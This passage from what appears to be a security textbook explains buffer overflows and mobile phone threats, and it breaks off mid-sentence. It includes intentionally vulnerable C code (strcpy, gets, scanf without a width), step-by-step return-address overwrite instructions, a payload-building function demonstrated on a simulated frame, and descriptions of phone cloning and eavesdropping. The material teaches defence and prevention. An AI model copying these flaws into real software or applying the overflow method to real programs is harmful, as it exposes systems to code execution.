Use a script to map unused file extensions to a 404 ("File not
found") error message.
Enable auditing and logging.
Use a firewall between the web server and the Internet and allow
only necessary ports (such as 80 and 443) through the firewall.
Use the POST method rather than GET when sending data to a web
server.
CHAPTER 21
Buffer Overflow Attack
Objective
21.1 Introduction
21.2 Threats of Buffer Overflow
21.3 Reasons for Buffer Overflow Attack
21.4 What is Stack?
21.5 Types of Overflow
21.6 Buffer Overflow and Web Applications
21.7 Examples
21.8 Countermeasure
On Oct. 19, 2000, hundreds of flights were grounded or delayed because
of a software problem in the Los Angeles air traffic control system. The
cause was attributed to a controller typing 9 characters (instead of five)
of flight description data, resulting in a buffer overflow.
21.1 Introduction
A buffer is a temporary data storage area. Buffers are data storage
areas which generally hold a predefined, finite amount of data.
A buffer overflow occurs when a program or process tries to store more
data in a buffer than it was intended to hold. Since buffers are created to
contain a finite amount of data, any extra information given can
overflow into adjacent buffers, corrupting or overwriting the valid data
held in them. Although it may occur accidentally through programming
error, buffer overflow is an increasingly common type of security attack
on data integrity. In buffer overflow attacks, the extra data may contain
code designed to trigger specific actions, in effect sending new
instructions to the attacked computer that could, for example, damage
the user's files, change data, or disclose confidential information. Buffer
overflow attacks are said to have arisen because the C programming
language supplied the framework, and poor programming practices
supplied the vulnerability.
In July 2000, a vulnerability to buffer overflow attack was discovered in
Microsoft Outlook and Outlook Express. A programming flaw made it
possible for an attacker to compromise the integrity of the target
computer simply by sending an e-mail message. Unlike the typical e-mail
virus, users could not protect themselves by not opening attached files;
in fact, the user did not even have to open the message to enable the
attack. The programs' message header parsing had a defect that made it
possible for senders to overflow the header buffer with extraneous data,
which allowed them to execute whatever code they desired on the
recipient's computer. Because the overflow was triggered as soon as the
recipient downloaded the message from the server, this type of buffer
overflow attack was very difficult to defend against. Microsoft has since
released a patch to eliminate the vulnerability.162
Malicious hackers launch buffer overflow attacks by deliberately
supplying data that they know will overflow a buffer, where the data
carries instructions that then end up in the computer's instruction
stream.163
21.2 Buffer Overflow Threats:
A Buffer Overflow is a flaw that occurs when more data is written to a
block of memory, or buffer, than the buffer is allocated to hold.
Exploiting a buffer overflow allows an attacker to modify portions of the
target process address space. This ability can be used for a number of
purposes, including the following:
Control the process execution
Crash the process
Modify internal variables
The attacker’s goal is almost always to control the target process’
execution. This is accomplished by identifying a function pointer in
memory that can be modified, directly or indirectly, using the overflow.
When such a pointer is used by the program to direct program execution
through a jump or call instruction, the attacker-supplied instruction
location will be used, thereby allowing the attacker to control the
process.
In many cases, the function pointer is modified to reference a location
where the attacker has placed assembled machine-specific instructions.
These instructions are commonly referred to as shell code, in reference to
162 http://searchsecurity.techtarget.com/definition/buffer-overflow
163 http://www.webopedia.com/TERM/B/buffer_overflow.html
the fact that attackers often wish to spawn a command-line environment,
or shell, in the context of the running process.164
21.3 Reasons for Buffer Overflow Attack:
Buffer overflow attacks depend on two things:
The lack of boundary (bounds) checking in the program, so that input
larger than the buffer is written into it anyway.
A machine that can execute code that resides in the data or stack
segment.
The lack of bounds checking is common, and with random input it usually
ends in a segmentation fault or bus error. In order to exploit a buffer
overflow to gain access or escalate privileges, the attacker must craft
the data fed to the application. Random data generates a segmentation
fault or bus error, never a remote shell or the execution of a command.
Process Memory Organization:
To understand stack buffers, we must first understand how a process is
organized in memory. Processes are divided into three regions:
Text, Data, and Stack. We will concentrate on the stack region, but first
a small overview of the other regions is in order.
The text region is fixed by the program and includes code (instructions)
and read-only data. This region corresponds to the text section of the
executable file. This region is normally marked read-only and any
attempt to write to it will result in a segmentation violation.
The data region contains initialized and uninitialized data; static
variables are stored in this region. It corresponds to the data and bss
sections of the executable file. Its size can be changed with the brk
system call. If the expansion of the bss data or the user stack exhausts
available memory, the process is blocked and is rescheduled to run again
with a larger memory space; new memory is added between the data and
stack segments.
164 http://projects.webappsec.org/w/page/13246916/Buffer%20Overflow
[Figure: process memory layout (text, data and stack regions); image source 165]
21.4 What Is A Stack?
A stack is an abstract data type frequently used in computer science. A
stack of objects has the property that the last object placed on the stack
will be the first object removed. This property is commonly referred to as
last in, first out queue, or a LIFO.
Several operations are defined on stacks. Two of the most important are
PUSH and POP. PUSH adds an element at the top of the stack. POP, in
contrast, reduces the stack size by one by removing the last element at
the top of the stack.
Why Do We Use A Stack?
Modern computers are designed with the need of high-level languages in
mind. The most important technique for structuring programs
165 http://cs.ucla.edu/classes/fall08/cs111/scribe/14/standardmem.gif
introduced by high-level languages is the procedure or function. From
one point of view, a procedure call alters the flow of control just as a
jump does, but unlike a jump, when finished performing its task, a
function returns control to the statement or instruction following the
call. This high-level abstraction is implemented with the help of the
stack.
The stack is also used to dynamically allocate the local variables used in
functions, to pass parameters to the functions, and to return values from
the function.166
The stack and the heap are the two storage areas for variables within a
running program. A stack variable has a size fixed at compile time and
is allocated automatically when its function is entered; heap memory is
requested at run time (with malloc() in C or new in C++) and can be of
any size. A heap-based buffer overflow overwrites neighbouring heap data
or the allocator's own bookkeeping, and its consequences are the same as
on the stack: a program can be made to open a shell or command prompt,
or to stop executing. The next section describes both stack-based and
heap-based buffer overflow attacks.
21.5 Types of Buffer Overflows
The two types of buffer overflows are:
Stack-based:
A buffer is simply some fixed space in memory used to store data. In C,
you create a buffer by declaring an array of some primitive type, such
as char array[SIZE] or int array[SIZE]. When these arrays are declared
as local variables, the space for their data is allocated on the stack.
The key point is that the space is fixed.
A stack based buffer overflow occurs when more data than what was
allocated is put into the buffer and the excess data “overflows” into other
stack memory space.
Stack-based buffer overflows are exploitable because of the way the stack
allocates stack frames when functions are called. Every time a function is
called the return address to jump back to the previously executing
function is stored on the stack.
166 http://www1.maths.leeds.ac.uk/~read/bofs.html
The data that overflows in the current stack frame can overwrite data in
the previous stack frame, manipulating the return address. Here’s an
example of an exploitable buffer overflow.
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    /* Copies the caller's string into a 16-byte stack buffer with no
       bounds check: any argument of 16 or more characters overflows buf. */
    void function(char *in) {
        char buf[16];
        strcpy(buf, in);
    }

    int main(int argc, char **argv) {
        if (argc > 1)
            function(argv[1]);   /* attacker-controlled command-line argument */
        return 0;
    }
5
Stack-Based Buffer Overflows
The following are the steps a hacker uses to execute a stack-based buffer
overflow:
1. Fill the buffer: supply input to the vulnerable buffer up to the
amount of stack memory allocated for it.
2. Overflow it: supply more data than the buffer was allocated, so that
the excess runs into the adjacent stack memory of the current frame (the
saved frame pointer and then the saved return address that tells the
program where to continue after the function finishes), and place the
chosen address in the bytes that land on the return address.
3. Divert execution: when the function returns, the CPU uses the
overwritten return address instead of the legitimate one. If the hacker
has successfully overwritten it with the address of the injected code,
the program executes the hacker's code instead of the program code.
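The three steps above, as an added example that is not part of the original listing: the struct below is a byte-exact model of what function() leaves on the stack (its 16-byte buf, then the saved frame pointer and the return address), so that the overwrite can be shown deterministically. On a real stack the layout is chosen by the compiler and writing past buf is undefined behaviour, which is why the model owns its own frame. The addresses (0x401136 for the legitimate return site, 0xdeadbeefcafef00d as the attacker's target) are made up, a little-endian host is assumed, and unsafe_copy, safe_copy and build_payload are names chosen here. The block also shows a constraint the steps leave out: strcpy stops at the first NUL byte, so a target address containing a zero byte cannot be delivered this way.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Added example, not from the original text. A byte-exact model of the frame
 * that function() above leaves on the stack, in the order the text describes:
 * the 16-byte local buffer, then the saved frame pointer and the return
 * address pushed by the call. A real frame's layout is compiler-chosen and
 * writing past buf is undefined behaviour, so the layout is made explicit
 * here in a struct that the demo owns. All addresses are made up. */
#define BUF_SIZE 16

struct frame {
    char     buf[BUF_SIZE];  /* char buf[16] from the listing                 */
    uint64_t saved_fp;       /* caller's frame pointer, saved by the prologue */
    uint64_t ret_addr;       /* where the function's ret will jump            */
};

static const uint64_t RET_LEGIT = 0x401136;   /* hypothetical return site   */
static const uint64_t FP_LEGIT  = 0x7ffd0000; /* hypothetical frame pointer */

/* Sets the frame up as the call would have left it. */
void fresh_frame(struct frame *f) {
    memset(f, 0, sizeof *f);
    f->saved_fp = FP_LEGIT;
    f->ret_addr = RET_LEGIT;
}

/* Models strcpy(buf, in): copies up to and including the NUL with no regard
 * for BUF_SIZE. The only bound is the size of the frame the model owns, so
 * the demo never writes outside its own memory. Returns the return address
 * the function would now jump to (little-endian host assumed). */
uint64_t unsafe_copy(struct frame *f, const char *in) {
    size_t n = strlen(in) + 1;
    if (n > sizeof *f)
        n = sizeof *f;
    memcpy(f, in, n);   /* bytes land in buf, then saved_fp, then ret_addr */
    return f->ret_addr;
}

/* The bounded alternative: reject input that does not fit with its NUL.
 * Returns 0 on success, -1 if the input would have overflowed. */
int safe_copy(struct frame *f, const char *in) {
    size_t n = strlen(in);
    if (n >= BUF_SIZE)
        return -1;
    memcpy(f->buf, in, n + 1);
    return 0;
}

/* Builds the attacker's string for step 2: filler for buf, filler for the
 * saved frame pointer, then the target address in little-endian byte order.
 * strcpy stops at the first NUL, so a target that contains a zero byte cannot
 * be delivered this way; that case returns 0. Otherwise returns the payload
 * length (not counting the terminating NUL). */
size_t build_payload(char *out, size_t outsz, uint64_t target) {
    size_t pos = 0, i;
    if (outsz < BUF_SIZE + 2 * sizeof(uint64_t) + 1)
        return 0;
    memset(out, 'A', BUF_SIZE);                  /* fills buf         */
    pos = BUF_SIZE;
    memset(out + pos, 'B', sizeof(uint64_t));    /* clobbers saved_fp */
    pos += sizeof(uint64_t);
    for (i = 0; i < sizeof(uint64_t); i++) {     /* clobbers ret_addr */
        unsigned char b = (unsigned char)(target >> (8 * i));
        if (b == 0)
            return 0;                            /* NUL would end the copy early */
        out[pos++] = (char)b;
    }
    out[pos] = '\0';
    return pos;
}

int main(void) {
    struct frame f;
    char payload[64];
    uint64_t target = 0xdeadbeefcafef00dULL;   /* made-up address of injected code */

    if (build_payload(payload, sizeof payload, target) == 0)
        return 1;
    fresh_frame(&f);
    printf("after strcpy-style copy: ret_addr = 0x%llx\n",
           (unsigned long long)unsafe_copy(&f, payload));
    fresh_frame(&f);
    printf("bounded copy: %d, ret_addr still 0x%llx\n",
           safe_copy(&f, payload), (unsigned long long)f.ret_addr);
    return 0;
}
```

Compile with cc -std=c99 -Wall. The run prints the clobbered return address after the strcpy-style copy and shows the bounded copy rejecting the same input with ret_addr intact; asking build_payload for a target such as 0x401136 returns 0 because its upper bytes are zero.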
Heap-Based Buffer Overflows
Exploitation of a buffer overflow on the heap is similar to exploiting a
stack based overflow, except that no return addresses are stored in this
segment of memory. Therefore, an attacker must use other techniques to
gain control of the execution-flow. An attacker could overwrite a function
pointer or perform an indirect pointer overwrite on pointers stored in
these memory regions, but these are not always available. Overwriting
the memory management information that is generally associated with
dynamically allocated memory is a more general way of exploiting a heap-
based overflow. Memory allocators allocate memory in chunks. These
chunks typically contain memory management information (referred to
as chunk info) alongside the actual data (chunk data). Many different
allocators can be attacked by overwriting the chunk info.
We will describe how dynamic memory allocators can be attacked by
focusing on a specific implementation of a dynamic memory allocator
called dlmalloc. Dlmalloc is the basis for ptmalloc, the allocator in
the GNU C Library (glibc) used on Linux. Ptmalloc mainly differs from
dlmalloc in offering better support for multithreading; this has no
direct impact on the way an attacker can abuse the allocator's
management information to perform code injection attacks. (Current glibc
versions add integrity checks on chunk metadata, so the classic overwrite
no longer works unmodified, but corrupting chunk info remains the basis
of heap exploitation.)
To detect program buffer overflow vulnerabilities that result from poorly
written source code, a hacker sends large amounts of data to the
application via a form field and sees what the program does as a result.
21.6 Buffer Overflow and Web Applications
Attackers use buffer overflows to corrupt the execution stack of a web
application. By sending carefully crafted input to a web application, an
attacker can cause the web application to execute arbitrary code –
effectively taking over the machine.
Buffer overflow flaws can be present either in the web server or
application server products that serve the static and dynamic parts of
the site, or in the web application itself. Buffer overflows found in
widely used server products are likely to become widely known and can
pose a significant risk to users of these products. When web
applications use native libraries, such as a graphics library to
generate images, they also expose themselves to potential buffer
overflow attacks in that library.
Buffer overflows can also be found in custom web application code, and
may even be more likely given the lack of scrutiny that web applications
typically go through. Buffer overflow flaws in custom web applications
are less likely to be detected because there will normally be far fewer
hackers trying to find and exploit such flaws in a specific application. If
discovered in a custom application, the ability to exploit the flaw other
than to crash the application is significantly reduced by the fact that the
source code and detailed error messages for the application are normally
not available to the hacker.
THE METHOD
For a buffer overrun attack to be possible and successful, the following
conditions must hold, in this order:
1. A buffer overflow vulnerability must be found, discovered, or identified.
2. The size of the buffer must be determined.
3. The attacker must be able to control the data written into the buffer.
4. There must be security-sensitive variables or executable program
instructions (or the return address that selects them) stored beyond the
end of the buffer in memory.
5. The targeted executable program instructions must be replaced with
other executable instructions.
21.7 Examples (Language: C)
Example 1
    #include <stdio.h>

    char last_name[20];
    printf("Enter your last name: ");
    scanf("%s", last_name);   /* %s without a width copies until whitespace */
The problem with the code above is that it does not restrict or limit the
size of the name entered by the user. The array holds 20 bytes, that is,
19 characters plus the terminating NUL. If the user enters
"Very_very_long_last_name", which is 24 characters long, scanf() writes
25 bytes and a buffer overflow occurs.
Example 2
The following code attempts to create a local copy of a buffer to perform
some manipulations on the data.
(Bad Code)
Example Language: C
    void manipulate_string(char *string) {
        char buf[24];
        strcpy(buf, string);   /* no check that string fits in 24 bytes */
        ...
    }
However, the programmer does not ensure that the size of the data
pointed to by string will fit in the local buffer and blindly copies the data
with the potentially dangerous strcpy() function. This may result in a
buffer overflow condition if an attacker can influence the contents of the
string parameter.
Example 3
The excerpt below calls the gets() function in C, which is inherently
unsafe.
(Bad Code)
Example Language: C
    #include <stdio.h>

    void read_name(void) {
        char buf[24];
        printf("Please enter your name and press <Enter>\n");
        gets(buf);   /* reads until newline, with no bound on the length */
        ...
    }
The programmer uses gets(), which is inherently unsafe because it blindly
copies all input from stdin to the buffer without restricting how much is
copied. This allows the user to provide a string that is larger than the
buffer size, resulting in an overflow condition. gets() was removed from
the C standard in C11 for exactly this reason.
Example 4
In the following example, a server accepts connections from a client and
processes the client request. After accepting a client connection, the
program obtains client information using the gethostbyaddr() function,
copies the hostname of the client that connected to a local variable and
writes the hostname of the client to a log file.
(Bad Code)
Example Languages: C and C++
    ...
    struct hostent *clienthp;
    char hostname[MAX_LEN];
    // create server socket, bind to server address and listen on socket
    ...
    // accept client connections and process requests
    int count = 0;
    for (count = 0; count < MAX_CONNECTIONS; count++) {
        socklen_t clientlen = sizeof(struct sockaddr_in);
        int clientsocket = accept(serversocket, (struct sockaddr *)&clientaddr,
                                  &clientlen);
        if (clientsocket >= 0) {
            clienthp = gethostbyaddr((char *)&clientaddr.sin_addr.s_addr,
                                     sizeof(clientaddr.sin_addr.s_addr), AF_INET);
            if (clienthp != NULL) {
                strcpy(hostname, clienthp->h_name);   // h_name may exceed MAX_LEN
                logOutput("Accepted client connection from host ", hostname);
            }
            // process client request
            ...
            close(clientsocket);
        }
    }
    close(serversocket);
    ...
However, the hostname of the client that connected (which is controlled
by whoever answers reverse DNS for the client's address) may be longer
than the allocated size of the local hostname variable. This results in
a buffer overflow when the client hostname is copied to the local
variable with strcpy().
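The four examples share two flawed calls: strcpy() and an unbounded read (scanf("%s") and gets()). The block below is an added example, not part of the original examples, with a bounded replacement for each: bounded_copy for Examples 2 and 4, read_line_bounded (fgets() with detection of overlong lines) for Examples 1 and 3, and scan_last_name for the case where scanf() must stay and a field width is added. The function names and stream_from (a tmpfile()-backed helper so the reader can be exercised on constructed text) are choices made here.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not from the original text: bounded replacements for the
 * strcpy(), scanf("%s") and gets() calls in Examples 1 to 4. Each reports
 * overlong input instead of writing past the buffer or truncating silently. */

/* Examples 2 and 4: replacement for strcpy(dst, src) that is told the
 * destination size. Returns 0 on success, -1 if src plus its NUL does not
 * fit; on failure dst is left as an empty string rather than a partial copy. */
int bounded_copy(char *dst, size_t dstsz, const char *src) {
    size_t n = strlen(src);
    if (dstsz == 0)
        return -1;
    if (n >= dstsz) {
        dst[0] = '\0';
        return -1;
    }
    memcpy(dst, src, n + 1);
    return 0;
}

/* Examples 1 and 3: replacement for gets(buf) and scanf("%s", buf) built on
 * fgets(), which takes the buffer size and stops after bufsz-1 characters.
 * The newline is stripped. If no newline was stored, the rest of the line
 * is drained so the next call starts on a fresh line. Returns 1 for a
 * complete line, 0 for a line that was cut to fit, -1 at EOF with nothing read. */
int read_line_bounded(char *buf, size_t bufsz, FILE *in) {
    size_t n;
    int c, dropped = 0;

    if (bufsz == 0 || fgets(buf, (int)bufsz, in) == NULL) {
        if (bufsz)
            buf[0] = '\0';
        return -1;
    }
    n = strlen(buf);
    if (n > 0 && buf[n - 1] == '\n') {
        buf[n - 1] = '\0';
        return 1;
    }
    while ((c = fgetc(in)) != EOF && c != '\n')
        dropped = 1;        /* discard what gets() would have written past buf */
    return dropped ? 0 : 1;
}

/* Example 1 when scanf() must stay: give %s a field width one less than the
 * array size. The width is generated from the same macro as the array size
 * so the two cannot drift apart. sscanf() on a string is used so it can be
 * exercised without stdin; scanf() takes the identical format. */
#define LAST_NAME_MAX 19
#define STR_(x) #x
#define STR(x) STR_(x)
int scan_last_name(const char *input, char last_name[LAST_NAME_MAX + 1]) {
    return sscanf(input, "%" STR(LAST_NAME_MAX) "s", last_name) == 1 ? 0 : -1;
}

/* Helper for trying the reader on constructed text: a tmpfile() holding it. */
FILE *stream_from(const char *text) {
    FILE *f = tmpfile();
    if (f == NULL)
        return NULL;
    fputs(text, f);
    rewind(f);
    return f;
}

int main(void) {
    char buf[24];
    char name[LAST_NAME_MAX + 1];
    int rc;

    printf("Please enter your name and press <Enter>\n");
    rc = read_line_bounded(buf, sizeof buf, stdin);
    if (rc < 0)
        return 1;
    printf("%s%s\n", buf, rc == 0 ? " (input was cut to 23 characters)" : "");

    if (scan_last_name("Very_very_long_last_name", name) == 0)
        printf("scanf with width kept: %s\n", name);   /* Very_very_long_last */
    return 0;
}
```

Note that strncpy() is not used as the strcpy() replacement: it does not NUL-terminate the destination when the source is too long, so a caller would still have to add the terminator and would not learn that input was cut. read_line_bounded returns 0 on a cut line precisely so the caller can decide to reject it rather than proceed with a silently shortened hostname or name.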
21.8 PREVENTION
We must bear in mind that all such buffer overflow attacks are
preventable; however, an effective vaccine must first be developed and
applied. The measures below are that vaccine.
1. Use Different Language Tools:
Use languages that provide automatic bounds checking, such as Perl,
Python, and Java. However, this is usually not possible or practical
when you consider that almost all modern operating systems in use today
are written in C. The choice of language becomes particularly critical
when low-level hardware access is necessary. The good news is that as
languages evolve, language and code security has become a serious
issue. For example, Microsoft in its .NET initiative re-wrote Visual
Basic and Visual C++ (Microsoft's proprietary version of the C++
language) with "string safe" security in mind, and added Visual C#,
which was designed from the ground up with security in mind.
2. Eliminate The Use Of Flawed Library Functions.
Programming languages are only as flawed as the programmer allows them
to be. The examples in 21.7 used two flawed functions from the Standard
C Library, gets() and strcpy(). These are just two of many such
functions (sprintf(), strcat() and scanf("%s") are others) that fail to
check the length or bounds of their arguments. For instance, the
vulnerability in Example 2 could have been eliminated by changing one
line of code: replacing strcpy() with a bounded copy (snprintf(), or
strlcpy() where available) that is told the destination holds only 24
bytes and must stop there, and then checking whether the input was cut.
Note that strncpy() is a poor substitute: it does not NUL-terminate the
destination when the source is too long, so the terminator must be added
explicitly. The persistence of programming errors of this nature may be
related to the manner in which we train and educate young programmers.
One can pick up an introductory college textbook on C or C++ and find
this set of flawed functions introduced by the third chapter. Sure, they
make great training aids. However, humans are creatures of habit and
tend to use what they know best and are most comfortable with.
3. Design and Build Security within Code:
It takes more work and more effort, but software can be designed with
security foremost in mind. In the previous example we could have added
one extra step to assure complete buffer safety. Again, this may go back
to how we train programmers. Is code security taught and encouraged? Are
they given the extra time to design security within their code?
Typically, and unfortunately, the answer to these questions is no.23
4. Use Safe Library Modules:
String-safe library modules are available for use, even in problematic
languages such as C++. For instance, the C++ standard library offers
std::string, which manages its own storage and grows as needed, so the
fixed-size overflows of the strcpy() kind do not arise; its at() member
additionally bounds-checks element access. It should be preferred over
the C string handling functions.
5. Use Available Middleware Libraries:
Several freeware "safe libraries" are available for use. For instance,
Bell Labs developed the libsafe24 library to guard against unsafe
function use. Libsafe works on the structure of
stack frame linkage: by following the frame pointer to the stack frame
that allocated a buffer, it can bound the size of that buffer when an
unsafe function executes and so prevent the return address from being
overwritten. However, libsafe is not without security problems of its
own: it has been reported that libsafe's protections can be bypassed in
a format-string-based attack by using flag characters that glibc
understands but libsafe does not.
6. Use Source Code Scanning Tools:
Several tools perform analysis on raw source code with the aim of
identifying undesirable constructs, including buffer vulnerabilities. A
simple first pass is to search the source for gets(), strcpy(),
strcat(), sprintf() and scanf("%s") and review every hit.
7. Use Compiler Enhancement Tools:
Compilers can protect the function return address themselves. With
stack canaries (a random value placed between the local buffers and the
saved return address and checked before the function returns; StackGuard
introduced the idea, and GCC and Clang implement it as
-fstack-protector) an overflow that reaches the return address is
detected and the program is aborted instead of being hijacked.
8. Disable Stack Execution:
Originally this required the kernel to be recompiled with patches,
available for some versions of UNIX, that render the stack
non-executable. Today nearly all operating systems and CPUs support it
by default (the NX bit, called DEP on Windows). Since classic buffer
overrun exploits depend on an executable stack, this stops them dead in
their tracks; attackers respond by reusing code already in the process
(return-oriented programming), which is why a non-executable stack is
combined with address space layout randomization (ASLR) and canaries.
9. Know What Is On Your System:
Awareness of what is on your system and who has the privileges to
execute it is essential. SUID root executables and root-owned
world-writable files and directories are the favourite target of many
attacks. Find them, list them, and know them.
10. Patch The Operating System And Applications:
Perhaps the very best defense is to stay informed and remain on the
offensive. As new vulnerabilities are discovered and reported, apply the
necessary patches and fixes promptly. If you are in a Microsoft shop,
this may get very tiresome very quickly. It may even seem like an
endless task.
CHAPTER 22
Mobile Security
Objective
22.1 Introduction
22.2 Challenges of mobile security
22.3 Mobile Vulnerabilities
22.4 Cell Phone Security Measures
22.5 Mobile Related Threats
22.6 Mobile Malwares
22.7 Mobile Based Attacks
22.1 Introduction
Previously, mobile users used their devices primarily for voice
communications, with little to no mobile data activity. The data
applications that were available were contained in a walled garden,
only available on the mobile carrier's network and thus closed off from
the rest of the data world.
However, the walled garden mobile environment has now quickly
changed as mobile devices are becoming more open. These open devices
need open networks to get the full benefit of the openness of the device.
This is pressuring mobile operators to open their networks and allow the
mobile user to do more with their devices. This in turn has led to a new
phenomenon in mobile applications, as mobile users can now access
thousands and thousands of applications.
Mobile commerce performed over these open mobile devices is also
becoming much more prevalent, with many mobile users now getting
more comfortable shopping or purchasing items with their mobile device.
All of these things open the door for mobile carriers to drive new
revenues. It also opens the door for new security threats that can
potentially do harm to mobile users and to the carrier’s revenue streams.
As smart phone sales continue to take off, the potential mobile targets for
hackers to perform malicious acts in order to achieve financial gain will
quickly outnumber those in the computer world. This time is
approaching very quickly and mobile carriers need to prepare now to
protect their networks and users from these new threats. The
consequences of not implementing security could have devastating
impacts on the future growth of the mobile industry.167
Consumers aren't the only ones making the shift to mobile devices.
Malicious hackers and identity thieves are following close behind. As
more and more people use their smartphones and other mobile devices to
do online banking, pay bills, and store critical personal and business
information, more and more bad guys are trying to break into these
mobile devices.
Mobile security will be the key to winning the war against this new
generation of cyber thieves. Mobile security can come in many shapes
and forms. Some protections are built directly into the device you're
using.
Other mobile security protections are built into the network, such as
strong encryption standards for data travelling across cellular
networks. But perhaps no mobile security device is as powerful as an
educated consumer who keeps his or her personal information protected
and avoids downloading suspicious applications or clicking on
booby-trapped links.168
The key factors contributing to the increasing need for mobile security
include:
1. Mobile devices—they are changing dramatically and are now as
powerful as laptops and other computing devices.
167 http://www.juniper.net/us/en/local/pdf/whitepapers/2000314-en.pdf
168 http://money.howstuffworks.com/personal-finance/online-banking/mobile-security.htm
2. Open devices and networks—services and applications have moved to
IP and given the user more control, exposing the network and users to
additional security risks.
3. Applications—thousands of applications with billions of downloads
are now available.
4. Massive increases in bandwidth from data services—these are
increasing the number of attacks on the network signaling and
application layers.
Mobile security has not traditionally been at the top of the priority list for
most mobile carriers. However, as the mobile industry becomes similar to
the fixed line world and the number of attacks continues to grow
substantially each year, mobile operators need to pay more attention to
securing their networks and subscribers. Without having a multilayer
security architecture in place, mobile attacks could have a dramatic
impact on the growth of the mobile industry.169
22.2 Challenges of mobile security
Threats
A Smartphone user is exposed to various threats when he uses his
phone. These threats can disrupt the operation of the Smartphone, and
transmit or modify the user data. For these reasons,
the applications deployed there must guarantee privacy and integrity of
the information they handle. In addition, since some apps could
themselves be malware, their functionality and activities should be
limited (for example, accessing location information via GPS, address
book, transmitting data on the network, sending SMS that are charged,
etc.).
There are three prime targets for attackers:
Data: smartphones are devices for data management, therefore they
may contain sensitive data like credit card numbers,
169 http://www.juniper.net/us/en/local/pdf/whitepapers/2000314-en.pdf
authentication information, private information, activity logs
(calendar, call logs);
Identity: smartphones are highly customizable, so the device or
its contents are associated with a specific person. For example,
every mobile device can transmit information related to the owner
of the mobile phone contract, and an attacker may want to steal
the identity of the owner of a smartphone to commit other
offenses;
Availability: by attacking a smartphone an attacker can limit access
to it and deprive the owner of the service.
The sources of these attacks are the same actors found in the non-mobile
computing space:
Professionals, whether commercial or military, who focus on the
three targets mentioned above. They steal sensitive data from the
general public, as well as undertake industrial espionage. They will
also use the identity of those attacked to achieve other attacks;
Thieves who want to gain income through data or identities they
have stolen. The thieves will attack many people to increase their
potential income;
Black hat hackers who specifically attack availability. Their goal is
to develop viruses, and cause damage to the device. In some cases,
hackers have an interest in stealing data on devices.
Grey hat hackers who reveal vulnerabilities. Their goal is to
expose vulnerabilities of the device. Grey hat hackers do not intend
on damaging the device or stealing data.170
170 http://en.wikipedia.org/wiki/Mobile_security
22.3 Mobile Vulnerabilities
There have recently been concerns about potential threats and security
issues in mobile phone technologies. Some analysts argue that mobile
phones are vulnerable to the same sort of security risks as PCs. The
truth may be that the situation is worse than that.
Be Aware! Your cell telephone has three major vulnerabilities:
1. Vulnerability to monitoring of your conversations while using the
phone.
2. Vulnerability of your phone being turned into a microphone to
monitor conversations in the vicinity of your phone while your phone
is inactive.
3. Vulnerability to "cloning," or the use of your phone number by others
to make calls that are charged to your account.
VULNERABILITY TO MONITORING
All cell telephones are radio transceivers. Your voice is transmitted
through the air on radio waves.
Radio waves are not directional -- they disperse in all directions so
that anyone with the right kind of radio receiver can listen in.
Although the law provides penalties for the interception of cellular
telephone calls, it is easily accomplished and impossible to detect.
Radio hobbyists have web sites where they exchange cell phone
numbers of "interesting" targets. Opportunistic hobbyists
sometimes sell their best "finds".
It is easy for an eavesdropper to determine a target's cell phone
number, because transmissions go back and forth to the cell site
whenever the cell phone has battery power and is able to receive a
call.
The scanner immediately picks up the initial transmission to the
cellular site to register the active system.
The number can be entered automatically into a file of numbers for
continuous monitoring.
VULNERABILITY TO BEING USED AS A MICROPHONE
A cell telephone can be turned into a microphone and transmitter
for the purpose of listening to conversations in the vicinity of the
phone.
This is done by transmitting a maintenance command on the
control channel to the cell phone.
This command places the cell telephone in the "diagnostic mode."
When this is done, conversations in the immediate area of the
telephone can be monitored over the voice channel.
The user doesn't know the telephone is in the diagnostic mode and
transmitting all nearby sounds until he or she tries to place a call.
Then, before the cell telephone can be used to place calls, the unit
has to be cycled off and then back on again.
This threat is the reason why cell telephones are prohibited in areas
where classified or sensitive discussions are held!
VULNERABILITY TO CLONING
Cell phone thieves don't steal cell phones in the usual sense of
breaking into a car and taking the telephone hardware.
Instead, they monitor the radio frequency spectrum and steal the
cell phone pair as it is being anonymously registered with a cell
site.
Cloning is the process whereby a thief intercepts the electronic
serial number (ESN) and mobile identification number (MIN) and
programs those numbers into another telephone to make it
identical to yours.
Once cloned, the thief can place calls on the reprogrammed
telephone as though he were the legitimate subscriber.
What makes this possible is the fact that each time your cell phone is
turned on or used; it transmits the pair to the local cellular site and
establishes a talk channel.
It also transmits the pair when it is relocated from one cell site to
another.
Cloning occurs most frequently in areas of high cell phone usage -- valet
parking lots, airports, shopping malls, concert halls, sports stadiums,
and high-congestion traffic areas in metropolitan cities.
No one is immune to cloning, but you can take steps to reduce the
likelihood of being the next victim.
22.4 CELL PHONE SECURITY MEASURES
If you are using a cell phone, you can reduce the risk by following
these guidelines:
Because a cell phone can be turned into a microphone without your
knowledge, do not carry a cell phone into any classified area or
other area where sensitive discussions are held.
Turn your cell phone on only when you need to place a call.
Turn it off after placing the call.
Do not discuss sensitive information on a cell phone.
When you call someone from your cell phone, consider advising
them that you are calling from a cell phone that is vulnerable to
monitoring, and that you will be speaking generally and not get into
sensitive matters.
Do not leave your cell phone unattended.
If your cell phone is vehicle-mounted, turn it off before permitting
valet parking attendants to park the car, even if the telephone
automatically locks when the car's ignition is turned off.
Avoid using your cell phone within several miles of the airport,
stadium, mall, or other heavy traffic locations.
These are areas where radio hobbyists use scanners for random
monitoring.
If they come across an interesting conversation, your number may
be marked for regular selective monitoring.
If your cell service company offers personal identification numbers
(PIN), consider using one.
Although cell PIN services are cumbersome and require that you
input your PIN for every call, they are an effective means of
preventing cloning.
CELL PHONE SECURITY RISK
Most current cell phones have the ability to send and receive text
messages. Some cell phones and PDAs also offer the ability to connect to
the internet. Although these are features that you might find useful and
convenient, attackers may try to take advantage of them. As a result, an
attacker may be able to accomplish the following:
1. Abuse your service - Most cell phone plans limit the number of
text messages you can send and receive. If an attacker spams
you with text messages, you may be charged additional fees. An
attacker may also be able to infect your phone or PDA with
malicious code that will allow them to use your service. Because
the contract is in your name, you will be responsible for the
charges.
2. Lure you to a malicious web site - While PDAs and cell phones
that give you access to email are targets for standard phishing
attacks, attackers are now sending text messages to cell
phones. These messages, supposedly from a legitimate
company, may try to convince you to visit a malicious site by
claiming that there is a problem with your account or stating
that you have been subscribed to a service. Once you visit the
site, you may be lured into providing personal information or
downloading a malicious file.
3. Use your cell phone or PDA in an attack - Attackers who can
gain control of your service may use your cell phone or PDA to
attack others. Not only does this hide the real attacker's
